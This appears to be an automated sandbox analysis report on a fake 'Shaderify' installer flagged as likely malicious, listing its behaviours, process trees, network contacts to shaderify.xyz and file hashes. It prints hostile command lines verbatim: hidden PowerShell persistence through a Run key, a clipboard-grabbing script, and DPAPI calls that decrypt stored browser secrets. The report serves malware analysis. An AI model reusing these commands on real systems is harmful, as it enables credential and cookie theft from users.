Analysis Overview
SHA256
db11f713b75df9ffea554ca36aa4135d4e258198af482eb4e72f45b74141f14b
Threat Level: Likely malicious
The file Shaderify_8.4.4.rar was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Loads dropped DLL
Adds Run key to start application
Looks up external IP address via web service
An obfuscated cmd.exe command-line is typically used to evade detection.
Program crash
Enumerates physical storage devices
Unsigned PE
Command and Scripting Interpreter: JavaScript
Enumerates processes with tasklist
Enumerates system info in registry
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 09:48
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win10v2004-20240508-en
Max time kernel
134s
Max time network
154s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\SHsCQhOwdefuZpv.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify 8.4.4.exe"
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES67C2.tmp" "c:\Users\Admin\AppData\Local\Temp\zyipflkp\CSC442EA518B586492B98A0FAB9AEB2D3.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1812 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2200 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Shaderify.exe" --type=gpu-process --field-trial-handle=1804,16734063316386581723,925908392957392502,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.62.21.104.in-addr.arpa | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\System.dll
| MD5 | 75ed96254fbf894e42058062b4b4f0d1 |
| SHA1 | 996503f1383b49021eb3427bc28d13b5bbd11977 |
| SHA256 | a632d74332b3f08f834c732a103dafeb09a540823a2217ca7f49159755e8f1d7 |
| SHA512 | 58174896db81d481947b8745dafe3a02c150f3938bb4543256e8cce1145154e016d481df9fe68dac6d48407c62cbe20753320ebd5fe5e84806d07ce78e0eb0c4 |
C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\nsis7z.dll
| MD5 | c6a070b3e68b292bb0efc9b26e85e9cc |
| SHA1 | 5a922b96eda6595a68fd0a9051236162ff2e2ada |
| SHA256 | 66ac8bd1f273a73e17a3f31d6add739d3cb0330a6417faeda11a9cae00b62d8b |
| SHA512 | 8eff8fc16f5bb574bd9483e3b217b67a8986e31497368c06fdaa3a1e93a40aee94a5b31729d01905157b0ae1e556a402f43cd29a4d30a0587e1ec334458a44e8 |
C:\Users\Admin\AppData\Local\Temp\nsf541C.tmp\StdUtils.dll
| MD5 | 33b4e69e7835e18b9437623367dd1787 |
| SHA1 | 53afa03edaf931abdc2d828e5a2c89ad573d926c |
| SHA256 | 72d38ef115e71fc73dc5978987c583fc8c6b50ff12e4a5d30649a4d164a8b6ae |
| SHA512 | ca890e785d1a0a7e0b4a748416fba417826ae66b46e600f407d4e795b444612a8b830f579f2cf5b6e051bea800604f34f8801cc3daf05c8d29ad05bcda454a77 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\ffmpeg.dll
| MD5 | eabfc10d56cb44a86493cb2f8ca7aab2 |
| SHA1 | 09d7e87f43527333cd021329d6c2f4e8bd8ddab5 |
| SHA256 | 42a2a996ac433ac33a22776b8418a82753557093d90147b7951138b5c83924b6 |
| SHA512 | ee31e3539fba9e5969a9f38c428f586de2dd7630cb5d8c5e3c2c934b5881f8176b8ab6ef6397c1ce4fa6ccf3ee9615225c7afa0e0b28c6fc23974e8b96625dec |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\icudtl.dat
| MD5 | ad2988770b8cb3281a28783ad833a201 |
| SHA1 | 94b7586ee187d9b58405485f4c551b55615f11b5 |
| SHA256 | df876c7af43ed93eec6aea4d2d55c805009c219653cdeb368f1d048f4922b108 |
| SHA512 | f27e542a9c6c60fa28c5b7cc2818079341ef93aef3bbcadecad2dc11aff5b1592b19c7ebfa543ea42a3cbfec26a668641b255545fb0912056e25e852c2dedd01 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\v8_context_snapshot.bin
| MD5 | c2208c06c8ff81bca3c092cc42b8df1b |
| SHA1 | f7b9faa9ba0e72d062f68642a02cc8f3fed49910 |
| SHA256 | 4a67de195878d290f49b503b83e415917b8bbcbd9936b07a5d33b48e9bc6e0a3 |
| SHA512 | 6c3c370dd086a976c44d4059a315bd3bcbb50961aa34734e65a40d861cffca9090d47cec74575afe23952e394e4845bda2d8798eebe01fb54a7a6288bce238f5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources\app.asar
| MD5 | e95d6f8d09a92e654aadf7a4117550cf |
| SHA1 | 8d1b84e9f8fae63fe5b598bdb767d1c062bf8ffe |
| SHA256 | 781877bb7bbe002e7dacbadc65241df8ae5842b8db297f61c8786fb8e7bab09b |
| SHA512 | 517c6e2a76a52880a08c18a0ea6201fdff385ed7485b462711eacf21dc32bf446539dc297c2517e9b049e0d9c3c5e1ea99ead5804ff3d90c728cf293e5589d2f |
C:\Users\Admin\AppData\Local\Temp\09af70a9-862f-4d0a-89c6-5ab85ea5bb83.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k3jjdbmk.fpn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5016-182-0x000001D1F68C0000-0x000001D1F68E2000-memory.dmp
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.cmdline
| MD5 | f3e706210daeebba6f59d0874c753703 |
| SHA1 | 864f54feb589cf24ba69a0150941b7199b09f977 |
| SHA256 | 24643f87d81dce65142b56f13f818c2d41a72d7b107da21c66ce18fd7f013a1f |
| SHA512 | 14152fac106302c8e1b11ee2699f1e7437bd519a993048c2379b64113845baf57918e0cfbab787f5b5c88679011fe66f50478392b1d27ccb004e8ec420159fef |
\??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\zyipflkp\CSC442EA518B586492B98A0FAB9AEB2D3.TMP
| MD5 | e5821ce688f3aed0b2468931775a2f2a |
| SHA1 | 7a3e896eb39287e3b455f05eae33e179cc0b5d81 |
| SHA256 | c113b69c698b779ee3075aa798a56f8c525eb7c791bba4071c898af6081e9e8d |
| SHA512 | d4229d6c161eae666eeae18849aa09476df6ef019a76d2ddbf9172e6e6595e8fb33125175a35423ecf2fcf4fbf88d2d1a1754440a088877e6055f7442cb21191 |
C:\Users\Admin\AppData\Local\Temp\RES67C2.tmp
| MD5 | ab545f8c3e530deeab49bae1185a7cc4 |
| SHA1 | 5f5a853684e7bab4084ce1eaa581d4aa6503d913 |
| SHA256 | 6108e7cce3de3727da00080164f61d375e726e83cb4a60d116922916f5414d33 |
| SHA512 | afea1426ebe23d9327a7e2bc7b136e8dfefcf074c7000fae4412904f697afc1dacfd4af273bd263807bf6449f82c616ab9cd4ecbc85313a0641b69c4110d0ddd |
C:\Users\Admin\AppData\Local\Temp\zyipflkp\zyipflkp.dll
| MD5 | 29a18389399044ccdc4150bfbccae7a5 |
| SHA1 | d3df3ed73c9583ebe50d3abc283f291a7488a093 |
| SHA256 | f9166045d42e1306b7c4dd84bd4261455bc714744ff2b65ceb8dfa5c2638b997 |
| SHA512 | 425a85d4be9626ad50501cdf47797c3bbf52f17d7bb71cdee7fbc3948205edf69259fdeb17819af7b9cac55f2cd2d7b727bf603a2d1b6b9e2f9baf8e5a53754b |
memory/5016-198-0x000001D1DC3E0000-0x000001D1DC3E8000-memory.dmp
memory/1240-210-0x00000271FC650000-0x00000271FC6A0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c3d0e052ba84a5a94a12f82b5523b45e |
| SHA1 | 18c9412da40f1d565c47dc150f782672a8913baa |
| SHA256 | 0937d02e49f29b26b70ae49a9709208b79a25cb2b927251e5ef2cce71942638d |
| SHA512 | 78a4c052734d4540e190e37c674302d1a234c9d83e0761b1337241519685dbe486b65a8d58919bc2e166c8a58395895fd1385b8a47f5fed4506dbf132ddfc607 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_100_percent.pak
| MD5 | 06baf0ad34e0231bd76651203dba8326 |
| SHA1 | a5f99ecdcc06dec9d7f9ce0a8c66e46969117391 |
| SHA256 | 5ae14147992a92548bcad76867dd88cdfcdb69d951c8720920cce6fb135e3189 |
| SHA512 | aff6616e56781ebb925a0ca146245ad3b2827250b32261c0c7c0d5b10b20a343a17fc3761c95d93104163e77b2eae3f1f9cbd3cb2b377f49b42bea39bdd09b91 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\chrome_200_percent.pak
| MD5 | 57c27201e7cd33471da7ec205fe9973c |
| SHA1 | a8e7bce09c4cbdae2797611b2be8aeb5491036f9 |
| SHA256 | dd8146b2ee289e4d54a4a0f1fd3b2f61b979c6a2baaba96a406d96c3f4fdb33b |
| SHA512 | 57258aa169bec66abf0f45a3e026bb68751fb970b74bd0cb465607fa3b2a89967e832d92d8f675f0449bb6662fcb7786d05f0597124cc8e18bb99a47245779b4 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\resources.pak
| MD5 | d13873f6fb051266deb3599b14535806 |
| SHA1 | 143782c0ce5a5773ae0aae7a22377c8a6d18a5b2 |
| SHA256 | 7b953443e3cd54a0a4775528b52fbfe5ebecbc2c71731600ed0999d227969506 |
| SHA512 | 1ab38fcb70d1958c74da2493459532b52a04b884009509a1ac8dd39f6e9e670658a52f4d19ef57f1bc71dccfdd6ceedbc18034bbcad0b500d75a97c74aac6939 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\locales\en-US.pak
| MD5 | bd8f7b719110342b7cefb16ddd05ec55 |
| SHA1 | 82a79aeaa1dd4b1464b67053ba1766a4498c13e7 |
| SHA256 | d1d3f892be16329c79f9a8ee8c5fa1c9fb46d17edfeb56a3d9407f9d7587a0de |
| SHA512 | 7cd1493e59e87c70927e66769eb200f79a57e1eb1223af4eb4064088571893d3e32cbc4b5ece568fd308992aad65684aa280dc9834f2b5d327bdee514b046e5e |
memory/736-241-0x00007FFC83400000-0x00007FFC83401000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\D3DCompiler_47.dll
| MD5 | 7641e39b7da4077084d2afe7c31032e0 |
| SHA1 | 2256644f69435ff2fee76deb04d918083960d1eb |
| SHA256 | 44422e6936dc72b7ac5ed16bb8bcae164b7554513e52efb66a3e942cec328a47 |
| SHA512 | 8010e1cb17fa18bbf72d8344e1d63ded7cef7be6e7c13434fa6d8e22ce1d58a4d426959bdcb031502d4b145e29cb111af929fcbc66001111fbc6d7a19e8800a5 |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libglesv2.dll
| MD5 | bc45db0195aa369cc3c572e4e9eefc7e |
| SHA1 | b880ca4933656be52f027028af5ef8a3b7e07e97 |
| SHA256 | a81729fd6ee2d64dfc47501a1d53794cdeee5c1daa3751f7554aea2503686d10 |
| SHA512 | dd8c39947e7d767fbdccf90c5b3eaedf3937b43c55200d2199107333b63ac09e5356c286618874fac841e1357dd927e0c70b5066c1feeedd8cc6c0fba605ee5f |
C:\Users\Admin\AppData\Local\Temp\2hKz7RyNFzXpF3YD41CyAiQnqEJ\libegl.dll
| MD5 | 660a9ae1282e6205fc0a51e64470eb5b |
| SHA1 | f91a9c9559f51a8f33a552f0145ed9e706909de8 |
| SHA256 | f2a841b6ef320f226965c7cb01fbc4709fc31425e490a3edfa20147ce3656c85 |
| SHA512 | 20bed2bed042033e3d8b077f9d66bce67922aaec180cc3777f20560219226b7efc73932bb87445afda4e3877472ddcd307215d23954cd082051437e5f2224263 |
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240226-en
Max time kernel
132s
Max time network
168s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
